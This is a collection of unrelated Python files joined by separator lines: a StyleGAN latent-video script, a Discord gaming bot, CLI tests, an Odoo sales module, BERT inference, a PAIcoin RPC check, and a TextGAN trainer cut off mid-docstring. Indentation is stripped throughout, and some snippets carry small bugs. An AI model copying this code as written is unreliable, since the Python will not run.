import sys
from moviepy.editor import *
if __name__ == "__main__":
if len(sys.argv)>1:
ENC_DIR = sys.argv[1]
else:
ENC_DIR = 'enc'
if len(sys.argv) > 2:
OUTPUT_DIR = sys.argv[2]
else:
OUTPUT_DIR = os.path.join('..', 'output')
shutil.rmtree(OUTPUT_DIR, ignore_errors=True)
os.makedirs(OUTPUT_DIR, exist_ok=True)
URL_FFHQ = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ'
URL_FFHQ_mirror = 'https://drive.google.com/uc?id=19B138TWKeOs-JIol0_K-CCCDMYXbK5bk'
tflib.init_tf()
try:
with dnnlib.util.open_url(URL_FFHQ, cache_dir=config.cache_dir) as f:
generator_network, discriminator_network, Gs_network = pickle.load(f)
except:
with dnnlib.util.open_url(URL_FFHQ_mirror, cache_dir=config.cache_dir) as f:
generator_network, discriminator_network, Gs_network = pickle.load(f)
generator = Generator(Gs_network, batch_size=1, randomize_noise=False)
def generate_image(latent_vector):
latent_vector = latent_vector.reshape((1, 18, 512))
generator.set_dlatents(latent_vector)
return generator.generate_images()[0]
def move_and_show(latent_vector, direction, coeffs, out_name):
vid_name = os.path.join(OUTPUT_DIR, out_name.replace('.npy', '.mp4'))
gen = {}
for i, coeff in enumerate(coeffs):
new_latent_vector = latent_vector.copy()
new_latent_vector[:8] = (latent_vector + coeff * direction)[:8]
if coeff not in gen:
gen[coeff] = generate_image(new_latent_vector)
video = ImageSequenceClip([gen[coeff] for coeff in coeffs], fps=30)
video.write_videofile(vid_name, codec='libx264')
print('finished '+vid_name)
smile_direction = np.load('ffhq_dataset/latent_directions/smile.npy')
coeffs = np.concatenate([np.arange(0, 2, .02), np.arange(2, -2, -.02), np.arange(-2, 0, .02)])
for file in os.listdir(ENC_DIR):
img = np.load(os.path.join(ENC_DIR, file))
move_and_show(img, smile_direction, coeffs, file)
|
print('Estamos probando conectar repositorio local con el de la nube')
|
import discord
import threading
import os
import random
from re import search
from flask import Flask, request, jsonify
from bot.models.intent import Intent
from bot.models.question_intent import QuestionIntent
from bot.constants.game_players import LeaguePlayers
from concurrent.futures import ThreadPoolExecutor
from .services.intent_proposer import IntentProposer
from .services.question_proposer import QuestionProposer
from .services.player_service import PlayerService
from .services.question_service import QuestionService
MAX_WORKERS = 3
client = discord.Client()
player_service = PlayerService()
question_service = QuestionService()
FLIPPING_CHOICES = ["(╯°Д°)╯︵/(.□ . \)", "ヽ(ຈل͜ຈ)ノ︵ ┻━┻", "(☞゚ヮ゚)☞ ┻━┻", "┻━┻︵ \(°□°)/ ︵ ┻━┻", "(┛ಠ_ಠ)┛彡┻━┻", "(╯°□°)╯︵ ┻━┻", "(ノಠ益ಠ)ノ彡┻━┻", "┻━┻︵ \(°□°)/ ︵ ┻━┻", "ʕノ•ᴥ•ʔノ ︵ ┻━┻", "(┛❍ᴥ❍)┛彡┻━┻", "(╯°□°)╯︵ ┻━┻ ︵ ╯(°□° ╯)", "(ノ^◡^)ノ︵ ┻━┻"]
UNFLIPPING_CHOICES = ["┬─┬ノ( ◕◡◕ ノ)", "┳━┳ ヽ(ಠل͜ಠ)ノ", "┏━┓┏━┓┏━┓ ︵ /(^.^/)", "┬─┬ノ( ಠ_ಠノ)", "(ヘ・_・)ヘ ┳━┳", "┳━┳ノ( OωOノ )", "┬──┬ ¯\_(ツ)", "┣ヘ(^▽^ヘ)Ξ(゚▽゚*)ノ┳━┳", "┬───┬ ノ༼ຈ ل͜ຈノ༽", "┬──┬ ノ( ゜-゜ノ)", "┏━┓ ︵ /(^.^/)"]
# Called when the client is done preparing the data received
# from Discord. Usually after login is successful and the
# Client.guilds and co. are filled up.
@client.event
async def on_ready():
print("Logged in")
# Called when the client has disconnected from Discord.
# This could happen either through the internet being disconnected,
# explicit calls to logout, or Discord terminating
# the connection one way or the other.
# This function can be called many times.
@client.event
async def on_disconnect():
print("Logged out")
@client.event
async def on_message(message):
# Don't let bot respond to itself
if message.author == client.user:
return
if not (search("elsa", message.content.lower())) \
and not (search("┻━┻", message.content)) \
and not (search("┳━┳", message.content)) \
and not search("┏━┓", message.content):
return
# proposrs are stateful, we need to make new ones on each run
# todo: make proposers stateless
intent_proposer = IntentProposer()
question_proposer = QuestionProposer()
is_question = False
# Determine intent
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
intent_future = executor.submit(intent_proposer.determine_intent, (message.content))
question_intent_future = executor.submit(question_proposer.determine_intent, (message.content))
intent, intent_confidence = intent_future.result()[0], intent_future.result()[1]
question_intent, question_confidence = question_intent_future.result()[0], question_intent_future.result()[1]
print(f"Intent: {intent}, Confidence: {str(intent_confidence)}")
print(f"Question Intent: {question_intent}, Confidence: {str(question_confidence)}")
is_question = True if (question_confidence >= intent_confidence) else False
if is_question:
await route_question_intent(message, question_intent)
else:
await route_intent(message, intent)
async def route_question_intent(message, intent):
if intent == QuestionIntent.EnoughForFivesIntent:
def filter_offline(member):
return member.status != discord.Status.offline and not member.bot
online_members = list(map(lambda x: x.name, filter(filter_offline, message.guild.members)))
league = list(filter(lambda x: x in LeaguePlayers, online_members))
if len(league) > 4:
await message.channel.send("Looks like it, online members that play league:\n" + ',\n'.join(league))
else:
await message.channel.send(f"Nope, looks like we need {5 - len(league)} more. Current online members that play league:\n" + ',\n'.join(league))
if intent == QuestionIntent.SkillQuestionIntent:
msg = question_service.choose_random_name()
await message.channel.send(msg)
if intent == QuestionIntent.UnknownQuestionIntent:
await message.channel.send("Unknown question")
async def route_intent(message, intent):
if intent == Intent.PlayGameIntent:
await message.channel.send("Ability to send messages to other players to play a game is not yet implemented")
if intent == Intent.UpdateProfileIntent:
await message.channel.send("Profiles are not yet implemented")
if intent == Intent.IdentifyPlayerIntent:
msg = player_service.get_player_opgg_profile(message)
await message.channel.send(msg)
if intent == Intent.FlipTableIntent:
await message.channel.send(random.choice(UNFLIPPING_CHOICES))
if intent == Intent.UnflipTableIntent:
await message.channel.send(random.choice(FLIPPING_CHOICES))
if intent == Intent.UnknownIntent:
await message.channel.send("Unknown intent")
client.run(os.environ.get("BOT_TOKEN"))
|
from os import (getcwd, path as osp)
from unittest.mock import (patch, MagicMock)
from click.testing import CliRunner
import pytest
from thug.cli import (meme, thug_meme, _form_result_path)
from .conftest import IMG_1_FACE
@pytest.fixture
def cli_runner():
return CliRunner()
@patch('thug.cli.Meme')
class TestMeme:
def test_it_creates_meme(self, meme_cls, cli_runner):
res = cli_runner.invoke(
meme, [IMG_1_FACE, 'my awesome', 'test meme'],
catch_exceptions=False)
assert res.exit_code == 0
assert meme_cls.return_value.create.call_count == 1
_, meme_kwargs = meme_cls.call_args
assert meme_kwargs['txt1'] == 'my awesome'
assert meme_kwargs['txt2'] == 'test meme'
@patch('thug.cli.ThugMeme')
class TestThug:
@pytest.mark.parametrize('detector_arg, detector',
[('opencv', 'thug.cli.HaarCascadeDetector'),
('dlib', 'thug.detect.dlib.DlibDetector')])
def test_it_creates_thug_meme(self, meme_cls, cli_runner, detector_arg,
detector):
with patch(detector) as detector:
detector = detector.return_value
thugs = MagicMock()
detector.find_thug_landmarks.return_value = thugs
res = cli_runner.invoke(
thug_meme, [
IMG_1_FACE, 'my awesome', 'thug meme', '--detector',
detector_arg
],
catch_exceptions=False)
assert res.exit_code == 0
assert detector.find_thug_landmarks.call_count == 1
assert meme_cls.return_value.create.call_count == 1
_, meme_kwargs = meme_cls.call_args
assert meme_kwargs['thug_landmarks'] == thugs
assert meme_kwargs['txt1'] == 'my awesome'
assert meme_kwargs['txt2'] == 'thug meme'
def test_it_does_not_accept_unknown_detector(self, meme_cls, cli_runner):
res = cli_runner.invoke(
thug_meme,
[IMG_1_FACE, 'my awesome', 'thug meme', '--detector', 'unknown'],
catch_exceptions=False)
assert res.exit_code == 2
assert not meme_cls.return_value.create.call_count
@pytest.mark.parametrize('meme_cls, command',
[('thug.cli.Meme', meme),
('thug.cli.ThugMeme', thug_meme)])
class TestCommonCliArgs:
def test_it_does_not_create_with_invalid_path(self, cli_runner, meme_cls,
command):
fpath = 'no-meme-for-you'
with patch(meme_cls) as meme_cls:
res = cli_runner.invoke(
command, [fpath, '', ''], catch_exceptions=False)
assert res.exit_code == 2
assert not meme_cls.return_value.create.call_count
@patch('thug.detect.dlib.DlibDetector')
@patch('thug.cli.HaarCascadeDetector')
def test_it_takes_into_account_config_overrides(
self, detector1, detector2, cli_runner, meme_cls, command):
o1 = ['-o', 'cigar_length', '0.123']
o2 = ['-o', 'glasses_width', '0.321']
o3 = ['-o', 'uknown', 'not going to be used']
args = [IMG_1_FACE, '', ''] + o1 + o2 + o3
with patch(meme_cls) as meme_cls:
res = cli_runner.invoke(command, args, catch_exceptions=False)
assert res.exit_code == 0
_, kwargs = meme_cls.call_args
conf = kwargs['config']
assert conf['cigar_length'] == '0.123'
assert conf['glasses_width'] == '0.321'
assert 'unknown' not in conf
class TestFormResultPath:
# yapf:disable
@pytest.mark.parametrize(
'orig_fname, extra, expected_fname',
[('img.jpg', '-thug', 'img-thug.jpg'),
('img.jpg', '', 'img.jpg'),
('img.with.dots.jpg', '-thug', 'img.with.dots-thug.jpg'),
('.starts-with-dot.jpg', '-thug', '.starts-with-dot-thug.jpg')])
# yapf:enable
def test_it_converts_file_name(self, orig_fname, extra, expected_fname):
orig = osp.join(osp.dirname(__file__), orig_fname)
result_dir = getcwd()
res = _form_result_path(
orig_path=orig, result_dir=result_dir, fname_extra=extra)
assert res == osp.join(result_dir, expected_fname)
|
from a10sdk.common.A10BaseClass import A10BaseClass
class AuthSamlIdp(A10BaseClass):
""" :param remote_file: {"optional": true, "type": "string", "description": "Profile name for remote url", "format": "url"}
:param use_mgmt_port: {"default": 0, "optional": true, "type": "number", "description": "Use management port as source port", "format": "flag"}
:param verify_xml_signature: {"default": 0, "optional": true, "type": "number", "description": "Verify metadata's XML signature", "format": "flag"}
:param saml_idp_name: {"description": "Metadata name", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}
:param overwrite: {"default": 0, "optional": true, "type": "number", "description": "Overwrite existing file", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
SAML metadata of identity provider.
Class auth-saml-idp supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/import/auth-saml-idp`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "auth-saml-idp"
self.a10_url="/axapi/v3/import/auth-saml-idp"
self.DeviceProxy = ""
self.remote_file = ""
self.use_mgmt_port = ""
self.verify_xml_signature = ""
self.saml_idp_name = ""
self.overwrite = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
import optunity
import optunity.metrics
# comment this line if you are running the notebook
import sklearn.svm
import numpy as np
decision_values = np.array([-0.69354811, -0.69354743, -0.69354744, -0.69354754, -0.69354715, -0.69354866, -0.69354775, -0.69355032, -0.69355325])
y_test = [0, 0, 0, 0, 0, 0, 0, 0, 0]
auc = optunity.metrics.roc_auc(y_test, decision_values)
|
# Solution of;
# Project Euler Problem 119: Digit power sum
# https://projecteuler.net/problem=119
#
# The number 512 is interesting because it is equal to the sum of its digits
# raised to some power: 5 + 1 + 2 = 8, and 83 = 512. Another example of a
# number with this property is 614656 = 284. We shall define an to be the nth
# term of this sequence and insist that a number must contain at least two
# digits to have a sum. You are given that a2 = 512 and a10 = 614656. Find
# a30.
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 119
timed.caller(dummy, n, i, prob_id)
|
from odoo import api, fields, models
class SaleOrderInfo(models.Model):
_inherit = 'sale.order'
order_day_info = fields.Char('Order Day')
Discount_code = fields.Char('Discount Code')
customer_email = fields.Char(related='partner_id.email', string='Customer Email')
def copy(self, default={}):
global lines
if not default.get('partner_id'):
default['partner_id'] = 59
lines = [(5, 0, 0)]
val = {
'product_id': 61
}
lines.append((0, 0, val))
self.order_line = lines
return super(SaleOrderInfo, self).copy(default)
class Saleorderline(models.Model):
_inherit = 'sale.order.line'
product_short_code = fields.Char('Product Short Code')
# product_category = fields.Many2one(comodel_name='product.template', string="Product Category")
cat = fields.Char(related = 'product_id.product_tmpl_id.categ_id.name')
class AddDetail(models.Model):
_inherit = 'sale.order'
def add_detail(self):
return True
class Tax(models.Model):
_inherit = 'sale.order'
tax_discount = fields.Selection([('10%', '10%'),
('5%', '5%'), ],
'Tax Discount',)
discount = fields.Float('Discount', readonly=True)
@api.onchange('tax_discount')
def discount_amount(self):
if self.tax_discount == '10%':
self.discount = ((10*self.amount_untaxed)/100)
self.amount_total = (self.amount_untaxed - self.discount + self.amount_tax)
elif self.tax_discount == '5%':
self.discount = ((5*self.amount_untaxed)/100)
self.amount_total = (self.amount_untaxed - self.discount + self.amount_tax)
else:
self.discount == 0
|
import sys
import argparse
import torch
import torch.nn.functional as F
from transformers import AutoTokenizer
from transformers import BertForSequenceClassification
sys.stdin.reconfigure(encoding='utf-8')
sys.stdout.reconfigure(encoding='utf-8')
def define_argparser():
p = argparse.ArgumentParser()
p.add_argument('--model_fn', default='bert_model.pth')
p.add_argument('--gpu_id',
type=int,
default=0 if torch.cuda.is_available() else -1)
p.add_argument('--batch_size', type=int, default=256)
p.add_argument('--top_k', type=int, default=1)
return p.parse_args()
def read_text():
lines = []
for line in sys.stdin:
if line.strip() != '':
lines += [line.strip()]
return lines
def main(config):
saved_data = torch.load(
config.model_fn,
map_location='cpu' if config.gpu_id < 0 else 'cuda:%d' % config.gpu_id
)
train_config = saved_data['config']
bert_best = saved_data['bert']
index_to_label = saved_data['classes']
lines = read_text()
with torch.no_grad():
# Declare model and load pre-trained weights.
tokenizer = AutoTokenizer.from_pretrained(train_config.pretrained_model_name)
model = BertForSequenceClassification.from_pretrained(
train_config.pretrained_model_name,
num_labels=len(index_to_label)
)
# 학습시켰던 다운스트림 태스크 모델을 삽입.
model.load_state_dict(bert_best)
if config.gpu_id >= 0:
model.cuda(config.gpu_id)
device = next(model.parameters()).device
model.eval()
y_hats = []
for idx in range(0, len(lines), config.batch_size):
mini_batch = tokenizer(
lines[idx:idx + config.batch_size],
padding=True,
truncation=True,
return_tensors='pt'
)
x = mini_batch['input_ids']
x = x.to(device)
mask = mini_batch['attention_mask']
mask = mask.to(device)
y_hat = F.softmax(model(x, attention_mask=mask)[0], dim=-1)
y_hats += [y_hat]
# Concatenate the mini-batch wise result
y_hats = torch.cat(y_hats, dim=0)
# |y_hats| = (len(lines), n_classes)
probs, indice = y_hats.cpu().topk(config.top_k)
# |indice| = (len(lines), top_k)
for i in range(len(lines)):
sys.stdout.write('%s\t%s\n' % (
' '.join([index_to_label[int(indice[i][j])] for j in range(config.top_k)]),
lines[i]
))
if __name__ == '__main__':
config = define_argparser()
main(config)
|
import sys
import os
import numpy as np
import torch
from tqdm import tqdm
from tabulate import tabulate
from torch.utils.data import DataLoader
from data.lmdb_dataset import LMDBDataset
from data.meta_dataset_reader import TRAIN_METADATASET_NAMES, ALL_METADATASET_NAMES
from models.model_utils import CheckPointer, sigmoid, cosine_sim
from models.model_helpers import get_domain_extractors
from models.losses import prototype_loss
from models.sur import apply_selection, sur
from models.models_dict import DATASET_MODELS_DICT
from utils import device
from config import args
def main():
LIMITER = 600
# Setting up datasets
extractor_domains = TRAIN_METADATASET_NAMES
all_test_datasets = ALL_METADATASET_NAMES
dump_name = args['dump.name'] if args['dump.name'] else 'test_dump'
testset = LMDBDataset(extractor_domains, all_test_datasets,
args['model.backbone'], 'test', dump_name, LIMITER)
# define the embedding method
dataset_models = DATASET_MODELS_DICT[args['model.backbone']]
embed_many = get_domain_extractors(extractor_domains, dataset_models, args)
accs_names = ['SUR']
all_accs = dict()
# Go over all test datasets
for test_dataset in all_test_datasets:
print(test_dataset)
testset.set_sampling_dataset(test_dataset)
test_loader = DataLoader(testset, batch_size=None, batch_sampler=None, num_workers=16)
all_accs[test_dataset] = {name: [] for name in accs_names}
for sample in tqdm(test_loader):
context_labels = sample['context_labels'].to(device)
target_labels = sample['target_labels'].to(device)
context_features_dict = {k: v.to(device) for k, v in sample['context_feature_dict'].items()}
target_features_dict = {k: v.to(device) for k, v in sample['target_feature_dict'].items()}
# optimize selection parameters and perform feature selection
selection_params = sur(context_features_dict, context_labels, max_iter=40)
selected_context = apply_selection(context_features_dict, selection_params)
selected_target = apply_selection(target_features_dict, selection_params)
final_acc = prototype_loss(selected_context, context_labels,
selected_target, target_labels)[1]['acc']
all_accs[test_dataset]['SUR'].append(final_acc)
# Make a nice accuracy table
rows = []
for dataset_name in all_test_datasets:
row = [dataset_name]
for model_name in accs_names:
acc = np.array(all_accs[dataset_name][model_name]) * 100
mean_acc = acc.mean()
conf = (1.96 * acc.std()) / np.sqrt(len(acc))
row.append(f"{mean_acc:0.2f} +- {conf:0.2f}")
rows.append(row)
table = tabulate(rows, headers=['model \\ data'] + accs_names, floatfmt=".2f")
print(table)
print("\n")
if __name__ == '__main__':
main()
|
import os
import sys
from requests import post
# A stupid fix for a stupid problem caused by PyCharm's inability to not overwrite
# the PYTHONPATH set in the Dockerfile
sys.path.append('/opt/api')
from core.blockchain.projectpai.paicoin.transaction import Transaction
CRYPTO_HOST = os.environ['CRYPTO_HOST']
CRYPTO_PORT = os.environ['CRYPTO_PORT']
CRYPTO_USER = os.environ['CRYPTO_USER']
CRYPTO_PASS = os.environ['CRYPTO_PASS']
CRYPTO_URL = r'http://%s:%s@%s:%s/' % (CRYPTO_USER,
CRYPTO_PASS,
CRYPTO_HOST,
CRYPTO_PORT)
def rpc(method, *params):
data = {"method": method,
"params": params,
"jsonrpc": "2.0"}
response = post(url=CRYPTO_URL, json=data)
return response
def bitcoin_verif():
txid = '01e8264ec83a95c542b84b517f50e07db48dd74791f5aecf2db193ed29ef47b4'
ref = '1670761-059393'
txid = 'be50ee21dc3ccfa82af175f2c4f65e818bef22df932f6255fc9c0dd30f997e75'
ref = '1670863-020670'
uuid = b'XhAT6dDrnt7ce7Tb7iKwouZ4v9BA2v9C'.decode('utf-8')
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
transaction.retrieve_by_txid(txid)
transaction.retrieve(ref)
def paicoin_verif_testnet():
txid = 'e4322d358c86a4eef1469cb4605fdc9775dc62e4813032dddf6cae8ecc7fc587'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
r2 = transaction.retrieve(ref)
return r2
def paicoin_verif_testnet2():
txid = r'378a3afbf690cefb38136c1fef0fa6a99dae2612bcb6cfbfb1678b9ee2cf9b96'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
return r1
def paicoin_verif_mainnet():
txid = r'81836400818dad36c96b128504f300e5d7568748de57db349ae8697a62851a69'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'].lower() == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
r.raise_for_status()
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
return r1
def paicoin_verif_mainnet2():
txid = r'8bbde050c4e4589d5bbe923e7b3f54e97132f889e7c818932f8b3a836d2e356a'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
return r1
'''
op_return
b'\x02\x00\x00\x00\x01gn\xda$\x0c\x02\'\x06\xb9_DV\xe1\xd9Lb\xbd\x04\xe6\tx\xa2\x9bp\xa2\xdb\x92\xb1\xa9\xc6\xb9\x98\x01\x00\x00\x00jG0D\x02 \']\x9c\xbc\x8c~\x9aj\xfe\xefY\x85Z\x84\x1b\xb5\xad{\xf1\xa3*\xe1\r\xf3N\x8b\xd1\xbemk\xd5\x7f\x02 G\xae8?\x16s-\x04x\x19#\xcd9\x82\x8d\x15\xb1\xfe\xe7\x05\xffQ\xe74\'\xda3.\x91\x92\\\xa8\x01!\x02\x95\x05\xd7K\xb0b0s[\\p\xdb\xb6\x9aU\xea\x1e\xaf\x13\n>h\xf6N\xb6|\xf8LV\x16\xb1(\xff\xff\xff\xff\x03\x80\x96\x98\x00\x00\x00\x00\x00\x19v\xa9\x14\x03\xd6\x12"\xe9]\x0fK\xc6{\xf4 \x8b\xc2 \xc8\xa0\xae\xf2\xf4\x88\xac<`^\x05\x00\x00\x00\x00\x19v\xa9\x14\x01(\xd7"\xae\x9fu\x8e\x87\xc0\xde-K\xa6r\x98\x80\x0c\x9b`\x88\xac\x00\x00\x00\x00\x00\x00\x00\x006j4\x92\x10\xff\xff\xff\xff\xff\xff\x00\xff \x840 i\xb9\xb28*\xd0\np\xc9H\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-10:
... ]
b'\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-32:]
b'\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-52:]
b'\xff\xff\xff\xff\x00\xff \x840 i\xb9\xb28*\xd0\np\xc9H\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-56:]
b'\x92\x10\xff\xff\xff\xff\xff\xff\x00\xff \x840 i\xb9\xb28*\xd0\np\xc9H\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-56:].hex()
'9210ffffffffffff00ff2084302069b9b2382ad00a70c948db2e95000000000000000000000000000000000400000000c0a2b64900000000'
'''
paicoin_verif_mainnet2()
|
# -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : instructor.py
# @Time : Created at 2019-04-25
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import numpy as np
import torch
import torch.nn as nn
import config as cfg
from metrics.bleu import BLEU
from metrics.clas_acc import ACC
from metrics.nll import NLL
from metrics.ppl import PPL
from utils.cat_data_loader import CatClasDataIter
from utils.data_loader import GenDataIter
from utils.helpers import Signal, create_logger, get_fixed_temperature
from utils.text_process import load_dict, write_tokens, tensor_to_tokens
import torch.nn.functional as F
class BasicInstructor:
def __init__(self, opt):
self.log = create_logger(__name__, silent=False, to_disk=True,
log_file=cfg.log_filename if cfg.if_test
else [cfg.log_filename, cfg.save_root + 'log.txt'])
self.sig = Signal(cfg.signal_file)
self.opt = opt
self.show_config()
self.clas = None
# load dictionary
self.word2idx_dict, self.idx2word_dict = load_dict(cfg.dataset)
# print("start self.train_data")
# Dataloader
try:
self.train_data = GenDataIter(cfg.train_data)
# print("finish self.train_data")
# by , add the if_context for later update!
self.test_data = GenDataIter(cfg.test_data, if_test_data=True, if_context=cfg.if_context)
# print("finish self.test_data")
except RuntimeError:
print("error in the self.train_data and self.test_data building")
pass
try:
self.train_data_list = [GenDataIter(cfg.cat_train_data.format(i)) for i in range(cfg.k_label)]
self.test_data_list = [GenDataIter(cfg.cat_test_data.format(i), if_test_data=True) for i in
range(cfg.k_label)]
self.clas_data_list = [GenDataIter(cfg.cat_test_data.format(str(i)), if_test_data=True) for i in
range(cfg.k_label)]
self.train_samples_list = [self.train_data_list[i].target for i in range(cfg.k_label)]
self.clas_samples_list = [self.clas_data_list[i].target for i in range(cfg.k_label)]
except:
pass
# Criterion
self.mle_criterion = nn.NLLLoss()
self.dis_criterion = nn.CrossEntropyLoss()
self.clas_criterion = nn.CrossEntropyLoss()
# Optimizer
self.clas_opt = None
# Metrics
self.bleu = BLEU('BLEU', gram=[2, 3, 4, 5], if_use=cfg.use_bleu)
self.nll_gen = NLL('NLL_gen', if_use=cfg.use_nll_gen, gpu=cfg.CUDA)
self.nll_div = NLL('NLL_div', if_use=cfg.use_nll_div, gpu=cfg.CUDA)
self.self_bleu = BLEU('Self-BLEU', gram=[2, 3, 4], if_use=cfg.use_self_bleu)
self.clas_acc = ACC(if_use=cfg.use_clas_acc)
self.ppl = PPL(self.train_data, self.test_data, n_gram=5, if_use=cfg.use_ppl)
self.all_metrics = [self.bleu, self.nll_gen, self.nll_div, self.self_bleu, self.ppl]
def _run(self):
print('Nothing to run in Basic Instructor!')
pass
def _test(self):
pass
def init_model(self):
if cfg.dis_pretrain:
self.log.info(
'Load pre-trained discriminator: {}'.format(cfg.pretrained_dis_path))
self.dis.load_state_dict(torch.load(cfg.pretrained_dis_path, map_location='cuda:{}'.format(cfg.device)))
# revised by
# if cfg.gen_pretrain: previous
if cfg.if_use_saved_gen:
# comment (not cfg.if_pretrain_mle) since sometimes, we want to cotinue training!
self.log.info('Load MLE pre-trained generator: {}'.format(cfg.pretrained_gen_path_used))
if cfg.device == torch.device("cpu"):
self.gen.load_state_dict(torch.load(cfg.pretrained_gen_path_used))
else:
self.gen.load_state_dict(torch.load(cfg.pretrained_gen_path_used, map_location='cuda:{}'.format(cfg.device)))
if cfg.CUDA:
self.gen = self.gen.cuda()
self.dis = self.dis.cuda()
@staticmethod
def compute_hiddens(model, seqs, if_detach=True, if_list2tensor_quick_computation=False):
if isinstance(seqs, list):
# : debug setting, we have to ensure there are more than one seq in seqs
if if_list2tensor_quick_computation and len(seqs) > 1:
# ==== condition 0 ====: from list input, where in the seq-context-one-long setting, we pad the different seq and train it
# previously, we set: 1+; but, after thinking, we should omit it and set our own plans: be careful of it and set it well! --- be careful!
seq_max_len = max([len (i) for i in seqs]) # list of m(length_of_one_long_seq) or m*vocab if linear embedding and get m
# torch.ones --> torch.float32, we should use long to get the required dtype
padded_front_idx = [(torch.ones(seq_max_len - len(i))*cfg.padding_idx).long().to(cfg.device) for i in seqs]
if cfg.if_linear_embedding:
padded_front_idx = [F.one_hot(one_seq, cfg.extend_vocab_size).float() for one_seq in
padded_front_idx] # [54,vocab_size]-<[54]
# unsqueeze to add the 1*batch dimension for the concatenation!
padded_seqs = [torch.cat([padded_front_idx[i], seqs[i]], dim=0).unsqueeze(0) for i in range(len(seqs))]
seqs = torch.cat(padded_seqs, dim=0)
# repeat the torch processing
batch_size = seqs.shape[0]
hidden = model.init_hidden(batch_size) # batch_size*1*512
# print(seqs.shape, hidden.shape)
_, hiddens = model.forward(seqs, hidden, need_hidden=True)
else:
# ===== condition 1 ====: from list input, we do not pad, and train it one by one
hiddens = []
for seq in seqs:
# seq shape, when linear embedding with one-hot, dimension is origina-seq-len*vocab_size * [545, 26685]
# seq shape, when default embedding without one-hot, dim share is [545]
batch_size = 1 # seq_one_long.shape[0], it should be (1*dynamic-edits)
hidden = model.init_hidden(batch_size) # 1, 1, 512
# print(seq.view(batch_size, -1).shape) # shape: 1, 545 # preivous we use seq=seq.view()
# set it when we have the stance training with only one post: 1*max_seq_len*vocab
if seq.shape[0] == 1:
seq_unsqueezed = seq
else:
seq_unsqueezed = seq.unsqueeze(0) # a universal solution for the w/ and w/o conditions for batch=1 # (1, a) from [a] or (1, a, b) from (a, b): linear embed
_, hidden = model.forward(seq_unsqueezed, hidden, need_hidden=True)
# if if_detach:
# hiddens.append(hidden.detach())
# else:
# hiddens.append(hidden)
hiddens.append(hidden)
hiddens = torch.cat(hiddens, dim=0) # batch_size*hidden_state
else:
# ==== condition 2 ====: directly compute from the tensor
assert isinstance(seqs, torch.Tensor) == True # shape: num_edit*max_len*vocab_size
batch_size = seqs.shape[0]
hidden = model.init_hidden(batch_size) # batch_size*1*hidden_dimension
_, hiddens = model.forward(seqs, hidden, need_hidden=True) # batch_size*1*hidden_dimension
if if_detach:
return hiddens.detach()
else:
return hiddens
def train_gen_epoch(self, model, data_loader, criterion, optimizer, compute_hidden=False, if_list2tensor_quick_computation=False,
if_relevancy_attention_aware_context = False,
if_one_hot_in_one_batch_in_malcom_exp = False
):
"""
:param model:
:param data_loader:
:param criterion:
:param optimizer:
:param compute_hidden:
